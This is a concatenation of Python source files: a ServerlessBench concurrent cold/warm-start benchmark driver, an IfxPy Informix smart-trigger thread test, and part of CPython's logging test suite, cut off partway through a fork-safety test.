                self._ready_obs[env_id] = timestep.obs
        return timesteps
|
run.py |
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
def client(i, results, loopTimes):
    """Run the benchmark script for one client and store its raw output.

    The output text is written into results[i] so the caller can parse it
    after all client threads have joined.
    """
    print("client %d start" % i)
    pipe = os.popen("./single-cold_warm.sh -R -t " + str(loopTimes))
    results[i] = pipe.read()
    print("client %d finished" % i)
def warmup(i, warmupTimes, actionName, params):
    """Invoke the action warmupTimes times so its container is warm."""
    for _ in range(warmupTimes):
        out = os.popen("wsk -i action invoke %s %s --result --blocking" % (actionName, params))
        out.read()
    print("client %d warmup finished" % i)
def main():
    """Drive the concurrent benchmark: warm up, run clients, summarize.

    Reads (clientNum, loopTimes, warmupTimes) from the command line, stops
    any running benchmark containers to force cold starts, warms up with one
    thread per client, then runs the timed clients and writes result.csv
    before printing the aggregate statistics.
    """
    argv = getargv()
    clientNum = argv[0]
    loopTimes = argv[1]
    warmupTimes = argv[2]
    containerName = "complexc"
    actionName = "complex-c"
    params = ""
    # Stop any running containers of this action so the first invocations
    # are genuine cold starts.
    r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" % containerName)
    r.read()
    # First: warm up
    threads = []
    for i in range(clientNum):
        t = threading.Thread(target=warmup, args=(i, warmupTimes, actionName, params))
        threads.append(t)
    for i in range(clientNum):
        threads[i].start()
    for i in range(clientNum):
        threads[i].join()
    print("Warm up complete")
    # Second: invoke the actions
    # Initialize the results and the clients
    threads = []
    results = ['' for _ in range(clientNum)]
    for i in range(clientNum):
        t = threading.Thread(target=client, args=(i, results, loopTimes))
        threads.append(t)
    for i in range(clientNum):
        threads[i].start()
    for i in range(clientNum):
        threads[i].join()
    latencies = []
    minInvokeTime = 0x7fffffffffffffff
    maxEndTime = 0
    # BUG FIX: the CSV handle was never closed; use a context manager so the
    # file is flushed to disk before the summary is computed.
    with open("result.csv", "w") as outfile:
        outfile.write("invokeTime,startTime,endTime\n")
        for i in range(clientNum):
            # get and parse the result of a client
            clientResult = parseResult(results[i])
            # print the result of every loop of the client
            for j in range(len(clientResult)):
                outfile.write(clientResult[j][0] + ',' + clientResult[j][1] +
                              ',' + clientResult[j][2] + '\n')
                # Collect the latency
                latency = int(clientResult[j][-1]) - int(clientResult[j][0])
                latencies.append(latency)
                # Find the first invoked action and the last return one.
                if int(clientResult[j][0]) < minInvokeTime:
                    minInvokeTime = int(clientResult[j][0])
                if int(clientResult[j][-1]) > maxEndTime:
                    maxEndTime = int(clientResult[j][-1])
    formatResult(latencies, maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
    """Parse one client's raw output into [invokeTime, startTime, endTime] rows.

    Each relevant line contains the word "invokeTime" followed by three
    13-digit millisecond timestamps; other lines are skipped. Timestamps
    missing from a malformed line are left as ''.

    Returns:
        list of 3-element lists of timestamp strings.
    """
    lines = result.split('\n')
    parsedResults = []
    for line in lines:
        if line.find("invokeTime") == -1:
            continue
        parsedTimes = ['', '', '']
        i = 0
        count = 0
        # BUG FIX: the original nested while-loops spun forever when a line
        # contained fewer than three timestamps (the inner scan exhausted the
        # line, leaving count < 3 with no way to progress), and raised
        # IndexError when it contained more. A single bounded scan does both
        # correctly and stops after the third timestamp.
        while i < len(line) and count < 3:
            if line[i].isdigit():
                parsedTimes[count] = line[i:i + 13]
                i += 13
                count += 1
            else:
                i += 1
        parsedResults.append(parsedTimes)
    return parsedResults
def getargv():
    """Parse and validate command-line arguments.

    Returns:
        (clientNum, loopTimes, warmupTimes) as ints; warmupTimes defaults to 1.
    Exits:
        With a non-zero status when the arguments are missing or invalid.
    """
    if len(sys.argv) != 3 and len(sys.argv) != 4:
        print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
        # BUG FIX: usage errors previously exited with status 0 (success),
        # which hides failures from shell scripts; use a non-zero status.
        exit(1)
    if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
        print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
        print("Client number and loop times must be an positive integer")
        exit(1)
    if len(sys.argv) == 4:
        if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
            print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
            print("Warm up times must be an positive integer")
            exit(1)
        return (int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3]))
    return (int(sys.argv[1]), int(sys.argv[2]), 1)
def formatResult(latencies, duration, client, loop, warmup):
    """Print latency/throughput statistics and append them to eval-result.log.

    Arguments:
        latencies: per-request latencies in milliseconds (sorted in place).
        duration: wall-clock span of the whole run, in milliseconds.
        client, loop, warmup: run parameters, echoed into the log file.
    """
    requestNum = len(latencies)
    latencies.sort()
    duration = float(duration)
    # calculate the average latency
    total = 0
    for latency in latencies:
        total += latency
    print("\n")
    print("------------------ result ---------------------")
    averageLatency = float(total) / requestNum
    # Percentiles via nearest-rank on the sorted list.
    _50pcLatency = latencies[int(requestNum * 0.5) - 1]
    _75pcLatency = latencies[int(requestNum * 0.75) - 1]
    _90pcLatency = latencies[int(requestNum * 0.9) - 1]
    _95pcLatency = latencies[int(requestNum * 0.95) - 1]
    _99pcLatency = latencies[int(requestNum * 0.99) - 1]
    print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
    print("%.2f\t%d\t%d\t%d\t%d\t%d" % (averageLatency, _50pcLatency, _75pcLatency, _90pcLatency, _95pcLatency, _99pcLatency))
    print("throughput (n/s):\n%.2f" % (requestNum / (duration / 1000)))
    # BUG FIX: the log handle was never closed; a context manager guarantees
    # the summary is flushed even if a write fails.
    with open("eval-result.log", "a") as resultfile:
        resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
        resultfile.write("client: %d, loop_times: %d, warup_times: %d\n" % (client, loop, warmup))
        resultfile.write("%d requests finished in %.2f seconds\n" % (requestNum, (duration / 1000)))
        resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
        resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" % (averageLatency, _50pcLatency, _75pcLatency, _90pcLatency, _95pcLatency, _99pcLatency))
        resultfile.write("throughput (n/s):\n%.2f\n" % (requestNum / (duration / 1000)))
main()
|
test_SmartTrigger.py | import IfxPy
from ctypes import *
import threading
import os
def printme1(outValue1):
    """Smart-trigger callback #1: echo the received payload to stdout."""
    print ("\nTest for callback function, value = ", outValue1)
def printme2(outValue2):
    """Smart-trigger callback #2: echo the received payload to stdout."""
    print ("\nTest for callback function, value = ", outValue2)
def task1():
    """Register a blocking smart-trigger loop on table t1 (thread worker).

    Uses the module-level `conn` and `temp` (trigger file descriptor) set up
    in the script body below; printme1 is invoked for each trigger event.
    """
    print("Task 1 assigned to thread: {}".format(threading.current_thread().name))
    print("ID of process running task 1: {}".format(os.getpid()))
    temp4 = IfxPy.register_smart_trigger_loop(conn, printme1, temp, "t1", "informix", "sheshdb", "select * from t1;", "label1", False, False)
    # Alternative UTF-8 database / non-ASCII table variant:
    #temp4 = IfxPy.register_smart_trigger_loop(conn, printme1, temp, "बस", "informix", "sheshdb_utf8", "select * from बस;", "label1", False, False)
def task2():
    """Register a blocking smart-trigger loop on table t2 (thread worker).

    Mirrors task1 but targets the UTF-8 database; printme2 is invoked for
    each trigger event.
    """
    print("Task 2 assigned to thread: {}".format(threading.current_thread().name))
    print("ID of process running task 2: {}".format(os.getpid()))
    # Non-UTF-8 database variant kept for reference:
    #temp5 = IfxPy.register_smart_trigger_loop(conn, printme2, temp, "t2", "informix", "sheshdb", "select * from t2;", "label2", False, False)
    temp5 = IfxPy.register_smart_trigger_loop(conn, printme2, temp, "t2", "informix", "sheshdb_utf8", "select * from t2;", "label2", False, False)
# Script body: connect, open a smart-trigger descriptor, and run two
# trigger-listening threads until both loops return.
# if __name__ == "__main__":
# UTF-8 connection string variant kept for reference:
# ConStr = "SERVER=ol_informix1410;DATABASE=sheshdb_utf8;HOST=127.0.0.1;SERVICE=1067;UID=informix;PWD=xxxx;DB_LOCALE=en_us.utf8;CLIENT_LOCALE=en_us.UTF8;"
ConStr = "SERVER=ol_informix1410;DATABASE=sheshdb;HOST=127.0.0.1;SERVICE=1067;UID=informix;PWD=xxx;"
conn = IfxPy.connect( ConStr, "", "")
# Open the smart-trigger session; `temp` is the file descriptor both tasks share.
temp = IfxPy.open_smart_trigger(conn, "Unique1", False, 5, 1, 0)
print ("\nFile descriptor = ", temp)
# creating threads
t1 = threading.Thread(target=task1, name='t1')
t2 = threading.Thread(target=task2, name='t2')
# starting threads
t1.start()
t2.start()
# wait until all threads finish
t1.join()
t2.join()
IfxPy.close(conn)
print ("Done")
test_logging.py | # Copyright 2001-2021 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2021 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import shutil
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.logging_helper import TestHandler
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import asyncore
import smtpd
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):

    """Base class for logging tests."""

    log_format = "%(name)s -> %(levelname)s: %(message)s"
    expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
    message_num = 0

    def setUp(self):
        """Setup the default logging stream to an internal StringIO instance,
        so that we can examine log output as we want."""
        self._threading_key = threading_helper.threading_setup()

        logger_dict = logging.getLogger().manager.loggerDict
        # Snapshot the module-global logging state under the logging lock so
        # tearDown can restore it exactly.
        logging._acquireLock()
        try:
            self.saved_handlers = logging._handlers.copy()
            self.saved_handler_list = logging._handlerList[:]
            self.saved_loggers = saved_loggers = logger_dict.copy()
            self.saved_name_to_level = logging._nameToLevel.copy()
            self.saved_level_to_name = logging._levelToName.copy()
            self.logger_states = logger_states = {}
            for name in saved_loggers:
                logger_states[name] = getattr(saved_loggers[name],
                                              'disabled', None)
        finally:
            logging._releaseLock()

        # Set two unused loggers
        self.logger1 = logging.getLogger("\xab\xd7\xbb")
        self.logger2 = logging.getLogger("\u013f\u00d6\u0047")

        self.root_logger = logging.getLogger("")
        self.original_logging_level = self.root_logger.getEffectiveLevel()

        self.stream = io.StringIO()
        self.root_logger.setLevel(logging.DEBUG)
        self.root_hdlr = logging.StreamHandler(self.stream)
        self.root_formatter = logging.Formatter(self.log_format)
        self.root_hdlr.setFormatter(self.root_formatter)
        # A leftover handler from a previous test would corrupt the output
        # stream assertions, so fail loudly here.
        if self.logger1.hasHandlers():
            hlist = self.logger1.handlers + self.root_logger.handlers
            raise AssertionError('Unexpected handlers: %s' % hlist)
        if self.logger2.hasHandlers():
            hlist = self.logger2.handlers + self.root_logger.handlers
            raise AssertionError('Unexpected handlers: %s' % hlist)
        self.root_logger.addHandler(self.root_hdlr)
        self.assertTrue(self.logger1.hasHandlers())
        self.assertTrue(self.logger2.hasHandlers())

    def tearDown(self):
        """Remove our logging stream, and restore the original logging
        level."""
        self.stream.close()
        self.root_logger.removeHandler(self.root_hdlr)
        while self.root_logger.handlers:
            h = self.root_logger.handlers[0]
            self.root_logger.removeHandler(h)
            h.close()
        self.root_logger.setLevel(self.original_logging_level)
        # Restore the global logging state captured in setUp, again under the
        # logging lock.
        logging._acquireLock()
        try:
            logging._levelToName.clear()
            logging._levelToName.update(self.saved_level_to_name)
            logging._nameToLevel.clear()
            logging._nameToLevel.update(self.saved_name_to_level)
            logging._handlers.clear()
            logging._handlers.update(self.saved_handlers)
            logging._handlerList[:] = self.saved_handler_list
            manager = logging.getLogger().manager
            manager.disable = 0
            loggerDict = manager.loggerDict
            loggerDict.clear()
            loggerDict.update(self.saved_loggers)
            logger_states = self.logger_states
            for name in self.logger_states:
                if logger_states[name] is not None:
                    self.saved_loggers[name].disabled = logger_states[name]
        finally:
            logging._releaseLock()

        self.doCleanups()
        threading_helper.threading_cleanup(*self._threading_key)

    def assert_log_lines(self, expected_values, stream=None, pat=None):
        """Match the collected log lines against the regular expression
        self.expected_log_pat, and compare the extracted group values to
        the expected_values list of tuples."""
        stream = stream or self.stream
        pat = re.compile(pat or self.expected_log_pat)
        actual_lines = stream.getvalue().splitlines()
        self.assertEqual(len(actual_lines), len(expected_values))
        for actual, expected in zip(actual_lines, expected_values):
            match = pat.search(actual)
            if not match:
                self.fail("Log line does not match expected pattern:\n" +
                          actual)
            self.assertEqual(tuple(match.groups()), expected)
        s = stream.read()
        if s:
            self.fail("Remaining output at end of log stream:\n" + s)

    def next_message(self):
        """Generate a message consisting solely of an auto-incrementing
        integer."""
        self.message_num += 1
        return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
    """Test builtin levels and their inheritance."""

    def test_flat(self):
        # Logging levels in a flat logger namespace.
        m = self.next_message

        ERR = logging.getLogger("ERR")
        ERR.setLevel(logging.ERROR)
        INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
        INF.setLevel(logging.INFO)
        DEB = logging.getLogger("DEB")
        DEB.setLevel(logging.DEBUG)

        # These should log.
        ERR.log(logging.CRITICAL, m())
        ERR.error(m())

        INF.log(logging.CRITICAL, m())
        INF.error(m())
        INF.warning(m())
        INF.info(m())

        DEB.log(logging.CRITICAL, m())
        DEB.error(m())
        DEB.warning(m())
        DEB.info(m())
        DEB.debug(m())

        # These should not log.
        ERR.warning(m())
        ERR.info(m())
        ERR.debug(m())

        INF.debug(m())

        self.assert_log_lines([
            ('ERR', 'CRITICAL', '1'),
            ('ERR', 'ERROR', '2'),
            ('INF', 'CRITICAL', '3'),
            ('INF', 'ERROR', '4'),
            ('INF', 'WARNING', '5'),
            ('INF', 'INFO', '6'),
            ('DEB', 'CRITICAL', '7'),
            ('DEB', 'ERROR', '8'),
            ('DEB', 'WARNING', '9'),
            ('DEB', 'INFO', '10'),
            ('DEB', 'DEBUG', '11'),
        ])

    def test_nested_explicit(self):
        # Logging levels in a nested namespace, all explicitly set.
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)

        # These should log.
        INF_ERR.log(logging.CRITICAL, m())
        INF_ERR.error(m())

        # These should not log.
        INF_ERR.warning(m())
        INF_ERR.info(m())
        INF_ERR.debug(m())

        self.assert_log_lines([
            ('INF.ERR', 'CRITICAL', '1'),
            ('INF.ERR', 'ERROR', '2'),
        ])

    def test_nested_inherited(self):
        # Logging levels in a nested namespace, inherited from parent loggers.
        m = self.next_message

        INF = logging.getLogger("INF")
        INF.setLevel(logging.INFO)
        INF_ERR = logging.getLogger("INF.ERR")
        INF_ERR.setLevel(logging.ERROR)
        # Loggers with no level of their own inherit the nearest ancestor's.
        INF_UNDEF = logging.getLogger("INF.UNDEF")
        INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
        UNDEF = logging.getLogger("UNDEF")

        # These should log.
        INF_UNDEF.log(logging.CRITICAL, m())
        INF_UNDEF.error(m())
        INF_UNDEF.warning(m())
        INF_UNDEF.info(m())
        INF_ERR_UNDEF.log(logging.CRITICAL, m())
        INF_ERR_UNDEF.error(m())

        # These should not log.
        INF_UNDEF.debug(m())
        INF_ERR_UNDEF.warning(m())
        INF_ERR_UNDEF.info(m())
        INF_ERR_UNDEF.debug(m())

        self.assert_log_lines([
            ('INF.UNDEF', 'CRITICAL', '1'),
            ('INF.UNDEF', 'ERROR', '2'),
            ('INF.UNDEF', 'WARNING', '3'),
            ('INF.UNDEF', 'INFO', '4'),
            ('INF.ERR.UNDEF', 'CRITICAL', '5'),
            ('INF.ERR.UNDEF', 'ERROR', '6'),
        ])

    def test_nested_with_virtual_parent(self):
        # Logging levels when some parent does not exist yet.
        m = self.next_message

        INF = logging.getLogger("INF")
        # Create the grandchild before its parent to exercise placeholder
        # (virtual) logger handling in the manager.
        GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
        CHILD = logging.getLogger("INF.BADPARENT")
        INF.setLevel(logging.INFO)

        # These should log.
        GRANDCHILD.log(logging.FATAL, m())
        GRANDCHILD.info(m())
        CHILD.log(logging.FATAL, m())
        CHILD.info(m())

        # These should not log.
        GRANDCHILD.debug(m())
        CHILD.debug(m())

        self.assert_log_lines([
            ('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
            ('INF.BADPARENT.UNDEF', 'INFO', '2'),
            ('INF.BADPARENT', 'CRITICAL', '3'),
            ('INF.BADPARENT', 'INFO', '4'),
        ])

    def test_regression_22386(self):
        """See issue #22386 for more information."""
        self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
        self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')

    def test_issue27935(self):
        fatal = logging.getLevelName('FATAL')
        self.assertEqual(fatal, logging.FATAL)

    def test_regression_29220(self):
        """See issue #29220 for more information."""
        logging.addLevelName(logging.INFO, '')
        self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
        self.assertEqual(logging.getLevelName(logging.INFO), '')
        self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
        self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):

    """Test the bundled Filter class."""

    def test_filter(self):
        # Only messages satisfying the specified criteria pass through the
        # filter.
        filter_ = logging.Filter("spam.eggs")
        handler = self.root_logger.handlers[0]
        try:
            handler.addFilter(filter_)
            spam = logging.getLogger("spam")
            spam_eggs = logging.getLogger("spam.eggs")
            spam_eggs_fish = logging.getLogger("spam.eggs.fish")
            spam_bakedbeans = logging.getLogger("spam.bakedbeans")
            spam.info(self.next_message())
            spam_eggs.info(self.next_message())  # Good.
            spam_eggs_fish.info(self.next_message())  # Good.
            spam_bakedbeans.info(self.next_message())
            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        finally:
            handler.removeFilter(filter_)

    def test_callable_filter(self):
        # Only messages satisfying the specified criteria pass through the
        # filter. Since 3.2 a plain callable can act as a filter.
        def filterfunc(record):
            parts = record.name.split('.')
            prefix = '.'.join(parts[:2])
            return prefix == 'spam.eggs'

        handler = self.root_logger.handlers[0]
        try:
            handler.addFilter(filterfunc)
            spam = logging.getLogger("spam")
            spam_eggs = logging.getLogger("spam.eggs")
            spam_eggs_fish = logging.getLogger("spam.eggs.fish")
            spam_bakedbeans = logging.getLogger("spam.bakedbeans")
            spam.info(self.next_message())
            spam_eggs.info(self.next_message())  # Good.
            spam_eggs_fish.info(self.next_message())  # Good.
            spam_bakedbeans.info(self.next_message())
            self.assert_log_lines([
                ('spam.eggs', 'INFO', '2'),
                ('spam.eggs.fish', 'INFO', '3'),
            ])
        finally:
            handler.removeFilter(filterfunc)

    def test_empty_filter(self):
        # A Filter with no name matches every record.
        f = logging.Filter()
        r = logging.makeLogRecord({'name': 'spam.eggs'})
        self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
# All custom levels, from most verbose (BORING) to least (SILENT), inclusive.
LEVEL_RANGE = range(BORING, SILENT + 1)

#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
    SILENT      : 'Silent',
    TACITURN    : 'Taciturn',
    TERSE       : 'Terse',
    EFFUSIVE    : 'Effusive',
    SOCIABLE    : 'Sociable',
    VERBOSE     : 'Verbose',
    TALKATIVE   : 'Talkative',
    GARRULOUS   : 'Garrulous',
    CHATTERBOX  : 'Chatterbox',
    BORING      : 'Boring',
}
class GarrulousFilter(logging.Filter):

    """A filter which blocks garrulous messages."""

    def filter(self, record):
        # Reject records at exactly the GARRULOUS level; pass everything else.
        blocked_levels = (GARRULOUS,)
        return record.levelno not in blocked_levels
class VerySpecificFilter(logging.Filter):

    """A filter which blocks sociable and taciturn messages."""

    def filter(self, record):
        # Pass only records that are neither SOCIABLE nor TACITURN.
        return record.levelno != SOCIABLE and record.levelno != TACITURN
class CustomLevelsAndFiltersTest(BaseTest):

    """Test various filtering possibilities with custom logging levels."""

    # Skip the logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"

    def setUp(self):
        BaseTest.setUp(self)
        # Register names for all the custom levels defined above.
        for k, v in my_logging_levels.items():
            logging.addLevelName(k, v)

    def log_at_all_levels(self, logger):
        # Emit one auto-numbered message at every custom level, low to high.
        for lvl in LEVEL_RANGE:
            logger.log(lvl, self.next_message())

    def test_logger_filter(self):
        # Filter at logger level.
        self.root_logger.setLevel(VERBOSE)
        # Levels >= 'Verbose' are good.
        self.log_at_all_levels(self.root_logger)
        self.assert_log_lines([
            ('Verbose', '5'),
            ('Sociable', '6'),
            ('Effusive', '7'),
            ('Terse', '8'),
            ('Taciturn', '9'),
            ('Silent', '10'),
        ])

    def test_handler_filter(self):
        # Filter at handler level.
        self.root_logger.handlers[0].setLevel(SOCIABLE)
        try:
            # Levels >= 'Sociable' are good.
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines([
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ])
        finally:
            self.root_logger.handlers[0].setLevel(logging.NOTSET)

    def test_specific_filters(self):
        # Set a specific filter object on the handler, and then add another
        # filter object on the logger itself.
        handler = self.root_logger.handlers[0]
        specific_filter = None
        garr = GarrulousFilter()
        handler.addFilter(garr)
        try:
            self.log_at_all_levels(self.root_logger)
            first_lines = [
                # Notice how 'Garrulous' is missing
                ('Boring', '1'),
                ('Chatterbox', '2'),
                ('Talkative', '4'),
                ('Verbose', '5'),
                ('Sociable', '6'),
                ('Effusive', '7'),
                ('Terse', '8'),
                ('Taciturn', '9'),
                ('Silent', '10'),
            ]
            self.assert_log_lines(first_lines)

            specific_filter = VerySpecificFilter()
            self.root_logger.addFilter(specific_filter)
            self.log_at_all_levels(self.root_logger)
            self.assert_log_lines(first_lines + [
                # Not only 'Garrulous' is still missing, but also 'Sociable'
                # and 'Taciturn'
                ('Boring', '11'),
                ('Chatterbox', '12'),
                ('Talkative', '14'),
                ('Verbose', '15'),
                ('Effusive', '17'),
                ('Terse', '18'),
                ('Silent', '20'),
            ])
        finally:
            if specific_filter:
                self.root_logger.removeFilter(specific_filter)
            handler.removeFilter(garr)
class HandlerTest(BaseTest):
    """Tests for Handler and the concrete handlers in logging.handlers."""

    def test_name(self):
        h = logging.Handler()
        h.name = 'generic'
        self.assertEqual(h.name, 'generic')
        h.name = 'anothergeneric'
        self.assertEqual(h.name, 'anothergeneric')
        # The base class's emit is abstract and must raise.
        self.assertRaises(NotImplementedError, h.emit, None)

    def test_builtin_handlers(self):
        # We can't actually *use* too many handlers in the tests,
        # but we can try instantiating them with various options
        if sys.platform in ('linux', 'darwin'):
            for existing in (True, False):
                fd, fn = tempfile.mkstemp()
                os.close(fd)
                if not existing:
                    os.unlink(fn)
                h = logging.handlers.WatchedFileHandler(fn, encoding='utf-8', delay=True)
                if existing:
                    # delay=True means the file is not opened yet, so the
                    # watched (dev, ino) pair is still the (-1, -1) sentinel.
                    dev, ino = h.dev, h.ino
                    self.assertEqual(dev, -1)
                    self.assertEqual(ino, -1)
                    r = logging.makeLogRecord({'msg': 'Test'})
                    h.handle(r)
                    # Now remove the file.
                    os.unlink(fn)
                    self.assertFalse(os.path.exists(fn))
                    # The next call should recreate the file.
                    h.handle(r)
                    self.assertTrue(os.path.exists(fn))
                else:
                    self.assertEqual(h.dev, -1)
                    self.assertEqual(h.ino, -1)
                h.close()
                if existing:
                    os.unlink(fn)
            if sys.platform == 'darwin':
                sockname = '/var/run/syslog'
            else:
                sockname = '/dev/log'
            try:
                h = logging.handlers.SysLogHandler(sockname)
                self.assertEqual(h.facility, h.LOG_USER)
                self.assertTrue(h.unixsocket)
                h.close()
            except OSError:  # syslogd might not be available
                pass
        for method in ('GET', 'POST', 'PUT'):
            if method == 'PUT':
                # Only GET and POST are valid HTTPHandler methods.
                self.assertRaises(ValueError, logging.handlers.HTTPHandler,
                                  'localhost', '/log', method)
            else:
                h = logging.handlers.HTTPHandler('localhost', '/log', method)
                h.close()
        h = logging.handlers.BufferingHandler(0)
        r = logging.makeLogRecord({})
        self.assertTrue(h.shouldFlush(r))
        h.close()
        h = logging.handlers.BufferingHandler(1)
        self.assertFalse(h.shouldFlush(r))
        h.close()

    def test_path_objects(self):
        """
        Test that Path objects are accepted as filename arguments to handlers.

        See Issue #27493.
        """
        fd, fn = tempfile.mkstemp()
        os.close(fd)
        os.unlink(fn)
        pfn = pathlib.Path(fn)
        cases = (
            (logging.FileHandler, (pfn, 'w')),
            (logging.handlers.RotatingFileHandler, (pfn, 'a')),
            (logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
        )
        if sys.platform in ('linux', 'darwin'):
            cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
        for cls, args in cases:
            h = cls(*args, encoding="utf-8")
            self.assertTrue(os.path.exists(fn))
            h.close()
            os.unlink(fn)

    @unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
    @unittest.skipIf(
        support.is_emscripten, "Emscripten cannot fstat unlinked files."
    )
    def test_race(self):
        # Issue #14632 refers.
        # A background thread repeatedly deletes the log file while the main
        # thread keeps logging through a WatchedFileHandler; the handler must
        # reopen the file instead of raising.
        def remove_loop(fname, tries):
            for _ in range(tries):
                try:
                    os.unlink(fname)
                    self.deletion_time = time.time()
                except OSError:
                    pass
                time.sleep(0.004 * random.randint(0, 4))

        del_count = 500
        log_count = 500

        self.handle_time = None
        self.deletion_time = None

        for delay in (False, True):
            fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
            os.close(fd)
            remover = threading.Thread(target=remove_loop, args=(fn, del_count))
            remover.daemon = True
            remover.start()
            h = logging.handlers.WatchedFileHandler(fn, encoding='utf-8', delay=delay)
            f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
            h.setFormatter(f)
            try:
                for _ in range(log_count):
                    time.sleep(0.005)
                    r = logging.makeLogRecord({'msg': 'testing' })
                    try:
                        self.handle_time = time.time()
                        h.handle(r)
                    except Exception:
                        print('Deleted at %s, '
                              'opened at %s' % (self.deletion_time,
                                                self.handle_time))
                        raise
            finally:
                remover.join()
                h.close()
                if os.path.exists(fn):
                    os.unlink(fn)

    # The implementation relies on os.register_at_fork existing, but we test
    # based on os.fork existing because that is what users and this test use.
    # This helps ensure that when fork exists (the important concept) that the
    # register_at_fork mechanism is also present and used.
    @support.requires_fork()
    def test_post_fork_child_no_deadlock(self):
        """Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
        class _OurHandler(logging.Handler):
            def __init__(self):
                super().__init__()
                self.sub_handler = logging.StreamHandler(
                    stream=open('/dev/null', 'wt', encoding='utf-8'))

            def emit(self, record):
                self.sub_handler.acquire()
                try:
                    self.sub_handler.emit(record)
                finally:
                    self.sub_handler.release()

        self.assertEqual(len(logging._handlers), 0)
        refed_h = _OurHandler()
        self.addCleanup(refed_h.sub_handler.stream.close)
        refed_h.name = 'because we need at least one for this test'
        self.assertGreater(len(logging._handlers), 0)
        self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
        test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
        test_logger.addHandler(refed_h)
        test_logger.setLevel(logging.DEBUG)

